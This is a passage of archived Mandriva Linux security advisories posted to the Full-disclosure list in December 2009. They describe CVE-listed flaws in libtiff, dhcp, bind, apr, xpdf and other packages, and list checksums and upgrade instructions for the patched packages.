2008.0/i586/ghostscript-doc-8.60-55.3mdv2008.0.i586.rpm d205693e3d3ba8da5f9197992d28ed13 2008.0/i586/ghostscript-dvipdf-8.60-55.3mdv2008.0.i586.rpm 6b4c9b0bcb0e00dfadf1e4d145a4c657 2008.0/i586/ghostscript-module-X-8.60-55.3mdv2008.0.i586.rpm 04b75844bec6d20e8d642ad0c217ad1f 2008.0/i586/ghostscript-X-8.60-55.3mdv2008.0.i586.rpm b20ee4fa316e601a73131d0cca1b1643 2008.0/i586/libgs8-8.60-55.3mdv2008.0.i586.rpm 121aea93ce9d622fb7d5f616e442bc86 2008.0/i586/libgs8-devel-8.60-55.3mdv2008.0.i586.rpm 157190bd96bc7326ce9291a67db738cf 2008.0/i586/libijs1-0.35-55.3mdv2008.0.i586.rpm 50d401f2135225ec3cad3881ceb084bd 2008.0/i586/libijs1-devel-0.35-55.3mdv2008.0.i586.rpm 5f649dc370d0b581b067d8b5db30a1a2 2008.0/SRPMS/ghostscript-8.60-55.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 54292241ec99616cedd3099e4d2ff6a5 2008.0/x86_64/ghostscript-8.60-55.3mdv2008.0.x86_64.rpm ede49cf300d10edf9b67067c13608fd2 2008.0/x86_64/ghostscript-common-8.60-55.3mdv2008.0.x86_64.rpm e75cb4fb3d2b00ff395da26109518f6b 2008.0/x86_64/ghostscript-doc-8.60-55.3mdv2008.0.x86_64.rpm 2644ccf83047b448e0d0097bab2dad19 2008.0/x86_64/ghostscript-dvipdf-8.60-55.3mdv2008.0.x86_64.rpm eaf0ee1db669bf25c30839b2da7782d1 2008.0/x86_64/ghostscript-module-X-8.60-55.3mdv2008.0.x86_64.rpm 62ad0f8af2eae01f62b178b6f9d1ae86 2008.0/x86_64/ghostscript-X-8.60-55.3mdv2008.0.x86_64.rpm d96e334812d8af6448214491832ee176 2008.0/x86_64/lib64gs8-8.60-55.3mdv2008.0.x86_64.rpm f129af9829956f8ad1aff56af496d31c 2008.0/x86_64/lib64gs8-devel-8.60-55.3mdv2008.0.x86_64.rpm 914c12790362c30b562f2a5b99748aec 2008.0/x86_64/lib64ijs1-0.35-55.3mdv2008.0.x86_64.rpm deff12b840779e49a2d14a30d46060f1 2008.0/x86_64/lib64ijs1-devel-0.35-55.3mdv2008.0.x86_64.rpm 5f649dc370d0b581b067d8b5db30a1a2 2008.0/SRPMS/ghostscript-8.60-55.3mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGCnxmqjQ0CJFipgRAgO1AKC3lP/mULkNhPd9/o91BePfDLB3uwCg0GjV q4PuQczr3V0LuJ8MhlTucZM= =e4Ko -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 00:40:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 01:40:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:169-1 ] libtiff Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:169-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libtiff Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities has been found and corrected in libtiff: Buffer underflow in the LZWDecodeCompat function in libtiff 3.8.2 allows context-dependent attackers to cause a denial of service (crash) via a crafted TIFF image, a different vulnerability than CVE-2008-2327 (CVE-2009-2285). Fix several places in tiff2rgba and rgb2ycbcr that were being careless about possible integer overflow in calculation of buffer sizes (CVE-2009-2347). This update provides fixes for these vulnerabilities. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2285 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2347 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 6942dec4f625c5ca859cbf2c35445d19 2008.0/i586/libtiff3-3.8.2-8.2mdv2008.0.i586.rpm 693b50058e610310fe22274ebcbd4a5e 2008.0/i586/libtiff3-devel-3.8.2-8.2mdv2008.0.i586.rpm 63c42fbe6a60eb5c5c0614d1b1ca6495 2008.0/i586/libtiff3-static-devel-3.8.2-8.2mdv2008.0.i586.rpm cf3bbc57b9eade53f75dfc5b28de96c6 2008.0/i586/libtiff-progs-3.8.2-8.2mdv2008.0.i586.rpm dd7d7876d10944c42ca76e8c71eb4c35 2008.0/SRPMS/libtiff-3.8.2-8.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: b4c14d385a14e9dbca6ccf1c37cdf1a4 2008.0/x86_64/lib64tiff3-3.8.2-8.2mdv2008.0.x86_64.rpm 97329de609ab88d18dccee7631825466 2008.0/x86_64/lib64tiff3-devel-3.8.2-8.2mdv2008.0.x86_64.rpm 0740aa57941c1b9413b463ef7267138d 2008.0/x86_64/lib64tiff3-static-devel-3.8.2-8.2mdv2008.0.x86_64.rpm 8f5619fd9995c58d83cf5c6b44576452 2008.0/x86_64/libtiff-progs-3.8.2-8.2mdv2008.0.x86_64.rpm dd7d7876d10944c42ca76e8c71eb4c35 2008.0/SRPMS/libtiff-3.8.2-8.2mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGC72mqjQ0CJFipgRAhgOAKDRVYDM0o1NDwx9HxlfFvvmB5PhtACgrvjc Eep0TsrNlfZSsSDV2xRDFXI= =2vwj -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 00:52:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 01:52:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:312 ] dhcp Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:312 http://www.mandriva.com/security/ _______________________________________________________________________ Package : dhcp Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in ISC DHCP: Integer overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before 3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5 Build 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075 and ACE 2 before 2.0.1 Build 55017, and Server before 1.0.4 Build 56528; allows remote attackers to cause a denial of service (daemon crash) or execute arbitrary code via a malformed DHCP packet with a large dhcp-max-message-size that triggers a stack-based buffer overflow, related to servers configured to send many DHCP options to clients (CVE-2007-0062). Stack-based buffer overflow in the script_write_params method in client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to execute arbitrary code via a crafted subnet-mask option (CVE-2009-0692). ISC DHCP Server is vulnerable to a denial of service, caused by the improper handling of DHCP requests. If the host definitions are mixed using dhcp-client-identifier and hardware ethernet, a remote attacker could send specially-crafted DHCP requests to cause the server to stop responding (CVE-2009-1892). Packages for 2008.0 are being provided due to extended support for Corporate products. This update provides fixes for this vulnerability. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0062 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1892 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 3081299715b66778098307681861d6d7 2008.0/i586/dhcp-client-3.0.7-0.1mdv2008.0.i586.rpm 65893c30e369cb54df581508c0a278ce 2008.0/i586/dhcp-common-3.0.7-0.1mdv2008.0.i586.rpm c7891651d44f4c66967789a594cb494f 2008.0/i586/dhcp-devel-3.0.7-0.1mdv2008.0.i586.rpm 6ddeab5add9a44c4c0d97fc98e98b48f 2008.0/i586/dhcp-doc-3.0.7-0.1mdv2008.0.i586.rpm 2c3e9e31d4c99a3622ce4c029ce7d5f9 2008.0/i586/dhcp-relay-3.0.7-0.1mdv2008.0.i586.rpm e9271dcc129000708f9537a5ad3a926f 2008.0/i586/dhcp-server-3.0.7-0.1mdv2008.0.i586.rpm 2a2e6cca8ab0d7c62e14aa19116ac860 2008.0/SRPMS/dhcp-3.0.7-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 137eaf194b2faa3a8de3b90453c47793 2008.0/x86_64/dhcp-client-3.0.7-0.1mdv2008.0.x86_64.rpm 79a273d98b5ef2f51c93c0f4d49ab82a 2008.0/x86_64/dhcp-common-3.0.7-0.1mdv2008.0.x86_64.rpm 4e1ca48b749ef04f4aff6dd6d9d34bde 2008.0/x86_64/dhcp-devel-3.0.7-0.1mdv2008.0.x86_64.rpm df97bbd0680f5b82417be5fb448a3493 2008.0/x86_64/dhcp-doc-3.0.7-0.1mdv2008.0.x86_64.rpm daa25b01f8fd36eeeedc2cb4c0e2c119 2008.0/x86_64/dhcp-relay-3.0.7-0.1mdv2008.0.x86_64.rpm 1d283afe24bb93f3c155a2b762e50988 2008.0/x86_64/dhcp-server-3.0.7-0.1mdv2008.0.x86_64.rpm 2a2e6cca8ab0d7c62e14aa19116ac860 2008.0/SRPMS/dhcp-3.0.7-0.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGDHfmqjQ0CJFipgRAhxkAJ9Hi8PHKRM/bBVsFI7ZX1xpSrfcBACfS+L+ jLmws+7KhLHXB/1Rh2rDXXw= =QOvE -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 01:07:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 02:07:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:157-1 ] perl-Compress-Raw-Zlib Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:157-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : perl-Compress-Raw-Zlib Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in perl-Compress-Raw-Zlib: Off-by-one error in the inflate function in Zlib.xs in Compress::Raw::Zlib Perl module before 2.017, as used in AMaViS, SpamAssassin, and possibly other products, allows context-dependent attackers to cause a denial of service (hang or crash) via a crafted zlib compressed stream that triggers a heap-based buffer overflow, as exploited in the wild by Trojan.Downloader-71014 in June 2009 (CVE-2009-1391). This update provides fixes for this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1391 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: c48dda4bf47776f250c73e2af40e3ceb 2008.0/i586/perl-Compress-Raw-Zlib-2.006-1.1mdv2008.0.i586.rpm 65d8176b3c1285376533c0f16d5d264c 2008.0/SRPMS/perl-Compress-Raw-Zlib-2.006-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: e6eeabfbd6bd0b9afe54fde0374327a1 2008.0/x86_64/perl-Compress-Raw-Zlib-2.006-1.1mdv2008.0.x86_64.rpm 65d8176b3c1285376533c0f16d5d264c 2008.0/SRPMS/perl-Compress-Raw-Zlib-2.006-1.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGDVSmqjQ0CJFipgRAmACAKDISShfYkpOrXwSKS9lGpxVI7FVygCg37Sj JISnjBHYvGdRn5Rj6anhHSg= =9AfA -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 01:18:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 02:18:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:158-3 ] pango Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:158-3 http://www.mandriva.com/security/ _______________________________________________________________________ Package : pango Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Integer overflow in the pango_glyph_string_set_size function in pango/glyphstring.c in Pango before 1.24 allows context-dependent attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a long glyph string that triggers a heap-based buffer overflow. This update corrects the issue. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1194 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 5fa3cde904bb3471f2808597d4495a90 2008.0/i586/libpango1.0_0-1.18.2-1.1mdv2008.0.i586.rpm 70cd4862c5bc27ff2548ea082ef2562b 2008.0/i586/libpango1.0_0-modules-1.18.2-1.1mdv2008.0.i586.rpm 06a9a5a78ffa999cb12bd5de367789cc 2008.0/i586/libpango1.0-devel-1.18.2-1.1mdv2008.0.i586.rpm 77ca034f4f673aef5ef9a147e7fd6b10 2008.0/i586/pango-1.18.2-1.1mdv2008.0.i586.rpm d57f4104fd1607dca80c7d4e8d775ae7 2008.0/i586/pango-doc-1.18.2-1.1mdv2008.0.i586.rpm 1d01963df79f7762776dc35e4023ea5b 2008.0/SRPMS/pango-1.18.2-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 1fdf6ef81c94fee53da3c154709483ad 2008.0/x86_64/lib64pango1.0_0-1.18.2-1.1mdv2008.0.x86_64.rpm 2a5831a2e8bdc4dcce62f8ecbe9f1dfd 2008.0/x86_64/lib64pango1.0_0-modules-1.18.2-1.1mdv2008.0.x86_64.rpm 18803302ca6edff9c50f9bb66e095e80 2008.0/x86_64/lib64pango1.0-devel-1.18.2-1.1mdv2008.0.x86_64.rpm 56a5dff6f3dc09912b22ea955970ae1c 2008.0/x86_64/pango-1.18.2-1.1mdv2008.0.x86_64.rpm 2b2fc7e5a1c7597dead4d6138089f7c3 2008.0/x86_64/pango-doc-1.18.2-1.1mdv2008.0.x86_64.rpm 1d01963df79f7762776dc35e4023ea5b 2008.0/SRPMS/pango-1.18.2-1.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGDftmqjQ0CJFipgRAuWMAJ4/ig6FYR6485O/yz4etEfyCTIySgCghpQU pNTF7F5vkWFvFfi8GU78a0E= =sn6S -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 01:44:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 02:44:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:313-1 ] bind Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:313-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : bind Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Some vulnerabilities were discovered and corrected in bind: Unspecified vulnerability in ISC BIND 9.4 before 9.4.3-P4, 9.5 before 9.5.2-P1, 9.6 before 9.6.1-P2, 9.7 beta before 9.7.0b3, and 9.0.x through 9.3.x with DNSSEC validation enabled and checking disabled (CD), allows remote attackers to conduct DNS cache poisoning attacks via additional sections in a response sent for resolution of a recursive client query, which is not properly handled when the response is processed at the same time as requesting DNSSEC records (DO). (CVE-2009-4022). Additionally BIND has been upgraded to the latest point release or closest supported version by ISC. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4022 https://www.isc.org/node/504 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 9cd003fb37a121f79e78b1c14094b7db 2008.0/i586/bind-9.4.3-0.1mdv2008.0.i586.rpm 7f07d510e3a8e1dfe311020bf86b599f 2008.0/i586/bind-devel-9.4.3-0.1mdv2008.0.i586.rpm fb8c5352c8a603bdd3f89e6051a2c48e 2008.0/i586/bind-utils-9.4.3-0.1mdv2008.0.i586.rpm a82b381cd9675db308d95aee3fa5502f 2008.0/SRPMS/bind-9.4.3-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 1ac44bf21e8144fb7c4bf49b0c9e094f 2008.0/x86_64/bind-9.4.3-0.1mdv2008.0.x86_64.rpm 2453e9625b1852561f6b6b6ebf17fdb2 2008.0/x86_64/bind-devel-9.4.3-0.1mdv2008.0.x86_64.rpm f8f5a39a4d1b33fef6a5441288fe0aa7 2008.0/x86_64/bind-utils-9.4.3-0.1mdv2008.0.x86_64.rpm a82b381cd9675db308d95aee3fa5502f 2008.0/SRPMS/bind-9.4.3-0.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGD4rmqjQ0CJFipgRAhfBAKDM3qLy6hw6/OjXZ18RCpj1hlxD0QCgiovL RJQHrdXqJsbK3toYp4tvwDQ= =CnAu -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 02:16:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 03:16:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:314 ] apr Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:314 http://www.mandriva.com/security/ _______________________________________________________________________ Package : apr Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple security vulnerabilities has been identified and fixed in apr and apr-util: Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR; or crafted calls to the (3) apr_rmm_malloc, (4) apr_rmm_calloc, or (5) apr_rmm_realloc function in misc/apr_rmm.c in APR-util; leading to buffer overflows. NOTE: some of these details are obtained from third party information (CVE-2009-2412). The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, related to an underflow flaw. (CVE-2009-0023). The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564 (CVE-2009-1955). Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input (CVE-2009-1956). Packages for 2008.0 are being provided due to extended support for Corporate products. The updated packages have been patched to prevent this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2412 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0023 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1955 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1956 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: d55d5dd456de0c7977f93bff217406d7 2008.0/i586/apr-util-dbd-mysql-1.2.10-1.1mdv2008.0.i586.rpm bd02eb2233dcc07aadd7e5eb84df9ce8 2008.0/i586/apr-util-dbd-pgsql-1.2.10-1.1mdv2008.0.i586.rpm 334e127fb8ac03379c8a5f2ee7c144b6 2008.0/i586/apr-util-dbd-sqlite3-1.2.10-1.1mdv2008.0.i586.rpm 4307983fb3d21ab0f9955711e116f92e 2008.0/i586/libapr1-1.2.11-1.1mdv2008.0.i586.rpm ff24f1e1587f2210346ea134d4a2053e 2008.0/i586/libapr-devel-1.2.11-1.1mdv2008.0.i586.rpm 3d50a85109e011ced9e36f1565e9bc69 2008.0/i586/libapr-util1-1.2.10-1.1mdv2008.0.i586.rpm b786e2329fc63d459b841bf001261543 2008.0/i586/libapr-util-devel-1.2.10-1.1mdv2008.0.i586.rpm 6ef7669ea3d0db3dbaed35f35ae2dbdc 2008.0/SRPMS/apr-1.2.11-1.1mdv2008.0.src.rpm 1a923fc9c2f912ef339b942a59bff4e6 2008.0/SRPMS/apr-util-1.2.10-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 91588bbcf3940cd106b0fe458be6d4b9 2008.0/x86_64/apr-util-dbd-mysql-1.2.10-1.1mdv2008.0.x86_64.rpm b71d8b14cc536cf8a2448b353d2b4047 2008.0/x86_64/apr-util-dbd-pgsql-1.2.10-1.1mdv2008.0.x86_64.rpm 10b889bb625dbae01711ed7e8e101744 2008.0/x86_64/apr-util-dbd-sqlite3-1.2.10-1.1mdv2008.0.x86_64.rpm 068334fc392c68f9b29e629dd3776f83 2008.0/x86_64/lib64apr1-1.2.11-1.1mdv2008.0.x86_64.rpm a9ed011d8b421e8604e66a87a4972477 2008.0/x86_64/lib64apr-devel-1.2.11-1.1mdv2008.0.x86_64.rpm c08da53c4c88464249f46c6577f3c2a8 2008.0/x86_64/lib64apr-util1-1.2.10-1.1mdv2008.0.x86_64.rpm 4b1b86a3e07f4b87a1a53f0dbaaa3aff 2008.0/x86_64/lib64apr-util-devel-1.2.10-1.1mdv2008.0.x86_64.rpm 6ef7669ea3d0db3dbaed35f35ae2dbdc 2008.0/SRPMS/apr-1.2.11-1.1mdv2008.0.src.rpm 1a923fc9c2f912ef339b942a59bff4e6 2008.0/SRPMS/apr-util-1.2.10-1.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGEWRmqjQ0CJFipgRAsWiAJ9LbNZNAkUIxWbq84aERpTacFEJPACg0xgy wuYdtSQeV/bOOP7w17qo2V0= =V8dA -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 02:37:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 03:37:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:287-1 ] xpdf Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:287-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : xpdf Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities has been found and corrected in xpdf: Integer overflow in the SplashBitmap::SplashBitmap function in Xpdf 3.x before 3.02pl4 and Poppler before 0.12.1 might allow remote attackers to execute arbitrary code via a crafted PDF document that triggers a heap-based buffer overflow. NOTE: some of these details are obtained from third party information. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2009-1188 (CVE-2009-3603). The Splash::drawImage function in Splash.cc in Xpdf 2.x and 3.x before 3.02pl4, and Poppler 0.x, as used in GPdf and kdegraphics KPDF, does not properly allocate memory, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PDF document that triggers a NULL pointer dereference or a heap-based buffer overflow (CVE-2009-3604). Integer overflow in the PSOutputDev::doImageL1Sep function in Xpdf before 3.02pl4, and Poppler 0.x, as used in kdegraphics KPDF, might allow remote attackers to execute arbitrary code via a crafted PDF document that triggers a heap-based buffer overflow (CVE-2009-3606). Integer overflow in the ObjectStream::ObjectStream function in XRef.cc in Xpdf 3.x before 3.02pl4 and Poppler before 0.12.1, as used in GPdf, kdegraphics KPDF, CUPS pdftops, and teTeX, might allow remote attackers to execute arbitrary code via a crafted PDF document that triggers a heap-based buffer overflow (CVE-2009-3608). Integer overflow in the ImageStream::ImageStream function in Stream.cc in Xpdf before 3.02pl4 and Poppler before 0.12.1, as used in GPdf, kdegraphics KPDF, and CUPS pdftops, allows remote attackers to cause a denial of service (application crash) via a crafted PDF document that triggers a NULL pointer dereference or buffer over-read (CVE-2009-3609). This update fixes these vulnerabilities. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3603 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3604 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3606 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3608 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3609 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 83c9a032b3183ea645e58c0d0f5143ff 2008.0/i586/xpdf-3.02-8.3mdv2008.0.i586.rpm 5f86604d615e3872176cec6aa6f27f60 2008.0/i586/xpdf-common-3.02-8.3mdv2008.0.i586.rpm 81a9a7f617d000ada7ce3f3ad34667b3 2008.0/i586/xpdf-tools-3.02-8.3mdv2008.0.i586.rpm ee385f975678b5fd6f5fb427d16f7b44 2008.0/SRPMS/xpdf-3.02-8.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 5a9c4a901fbe84c6a8fe3de44fd3cf78 2008.0/x86_64/xpdf-3.02-8.3mdv2008.0.x86_64.rpm c193e9fd9fe46c3f433ecf8eaddb6944 2008.0/x86_64/xpdf-common-3.02-8.3mdv2008.0.x86_64.rpm 4446036c4bbb8d8895d9cad41a38ff04 2008.0/x86_64/xpdf-tools-3.02-8.3mdv2008.0.x86_64.rpm ee385f975678b5fd6f5fb427d16f7b44 2008.0/SRPMS/xpdf-3.02-8.3mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 